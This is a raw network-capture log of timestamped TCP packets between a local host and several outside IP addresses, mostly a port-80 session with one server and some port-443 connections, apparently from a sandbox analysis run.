Nov 9, 2024 02:47:34.012557030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012564898 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012577057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012588024 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012590885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012599945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012615919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012625933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012630939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012648106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012650013 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012661934 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012664080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012675047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012687922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012691021 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012706041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012715101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012717009 CET	53036	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.012720108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012725115 CET	443	53036	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.012729883 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012743950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012744904 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012758017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012770891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012789011 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012797117 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012804985 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012814999 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012830973 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012871981 CET	53035	443	192.168.2.7	13.107.246.57
Nov 9, 2024 02:47:34.012871981 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012882948 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012887955 CET	443	53035	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.012902021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012918949 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012931108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.012936115 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012947083 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.012968063 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013001919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013027906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013040066 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013040066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013057947 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013067007 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013073921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013073921 CET	53040	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.013084888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013084888 CET	443	53040	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.013087034 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013104916 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013109922 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013123989 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013171911 CET	53040	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.013200998 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013212919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013231039 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013235092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013250113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013254881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013261080 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013276100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013289928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013308048 CET	53033	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.013314009 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013319016 CET	443	53033	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.013320923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013329029 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013331890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013345003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013359070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013359070 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013370991 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013381958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013389111 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013401031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013406038 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013420105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013427019 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013433933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013439894 CET	53034	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.013456106 CET	443	53034	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.013456106 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013470888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013480902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013480902 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013493061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013504982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013510942 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013523102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013545036 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013555050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013566017 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013566017 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013582945 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013586044 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013605118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013608932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013617039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013628006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013637066 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013641119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013653040 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013653994 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013667107 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013680935 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013694048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013700008 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013710022 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013720989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013736010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013746023 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013746977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013765097 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013794899 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013828039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013861895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013879061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013883114 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013906956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013916969 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013927937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013930082 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013938904 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013962030 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.013998032 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.013999939 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.014010906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.014049053 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.016535997 CET	53040	443	192.168.2.7	13.107.246.45
Nov 9, 2024 02:47:34.016546965 CET	443	53040	13.107.246.45	192.168.2.7
Nov 9, 2024 02:47:34.016902924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.016922951 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.016926050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.016932011 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.016948938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.016952038 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.016968012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.016978979 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.016982079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.016993999 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017008066 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017021894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017030001 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017050028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017050982 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017057896 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017061949 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017077923 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017085075 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017090082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017102957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017110109 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017116070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017142057 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017148018 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017162085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017172098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017182112 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017182112 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017188072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017191887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017199039 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017205954 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017219067 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017226934 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017230034 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017232895 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017244101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017255068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017266989 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017283916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017302036 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017302990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017317057 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017324924 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017333984 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017344952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017355919 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017364979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017369986 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017374992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017378092 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017381907 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017383099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017395020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017406940 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017407894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017421007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017432928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017435074 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017452955 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017465115 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017465115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017477989 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017502069 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017508984 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017508984 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017514944 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017538071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017539024 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017550945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017553091 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017563105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017579079 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017591953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017592907 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017606020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017608881 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017618895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017630100 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017632008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017644882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017643929 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017663956 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017666101 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017676115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.017677069 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017707109 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.017731905 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.043345928 CET	443	53022	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:34.051332951 CET	443	53025	13.107.246.57	192.168.2.7
Nov 9, 2024 02:47:34.055305958 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.055342913 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.055442095 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.055450916 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.055516005 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.055677891 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.055969000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.055980921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.055998087 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.056008101 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.056020021 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.056026936 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.056052923 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.056080103 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.056086063 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.056107998 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.056135893 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.056143999 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.056195021 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.056200981 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.056516886 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.056880951 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.056888103 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.056931019 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.056962013 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.056976080 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.056982994 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.057051897 CET	53026	443	192.168.2.7	142.250.113.132
Nov 9, 2024 02:47:34.057059050 CET	443	53026	142.250.113.132	192.168.2.7
Nov 9, 2024 02:47:34.084155083 CET	443	53019	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:34.084851027 CET	53019	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:34.084925890 CET	443	53019	13.89.178.27	192.168.2.7
Nov 9, 2024 02:47:34.085009098 CET	53019	443	192.168.2.7	13.89.178.27
Nov 9, 2024 02:47:34.110924959 CET	443	53024	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:34.111414909 CET	53024	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:34.111428976 CET	443	53024	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:34.112503052 CET	443	53024	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:34.112576962 CET	53024	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:34.114325047 CET	53024	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:34.114406109 CET	443	53024	20.99.185.48	192.168.2.7
Nov 9, 2024 02:47:34.114558935 CET	53024	443	192.168.2.7	20.99.185.48
Nov 9, 2024 02:47:34.118881941 CET	443	53023	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:34.118974924 CET	53023	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:34.123018980 CET	53023	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:34.123032093 CET	443	53023	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:34.127650023 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127685070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127718925 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127748966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127752066 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.127762079 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127806902 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.127832890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127846003 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127857924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127868891 CET	53041	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:34.127868891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127878904 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.127883911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127887964 CET	443	53041	3.167.152.61	192.168.2.7
Nov 9, 2024 02:47:34.127902031 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.127923012 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127933979 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.127935886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127948046 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.127964973 CET	53041	443	192.168.2.7	3.167.152.61
Nov 9, 2024 02:47:34.127979040 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128000975 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128093004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128130913 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128143072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128168106 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128173113 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128175020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128180981 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128187895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128192902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128201008 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128202915 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128223896 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128248930 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128273010 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128287077 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128297091 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128315926 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128346920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128370047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128388882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128408909 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128421068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128429890 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128434896 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128447056 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128448009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128473997 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128500938 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128848076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128859997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128870964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128890038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128901958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128901958 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128914118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128926992 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128937960 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128941059 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128950119 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128952026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.128974915 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128993988 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.128998041 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129010916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129023075 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:34.129040003 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129056931 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:34.129070044 CET	52982	80	192.168.2.7	77.220.212.32
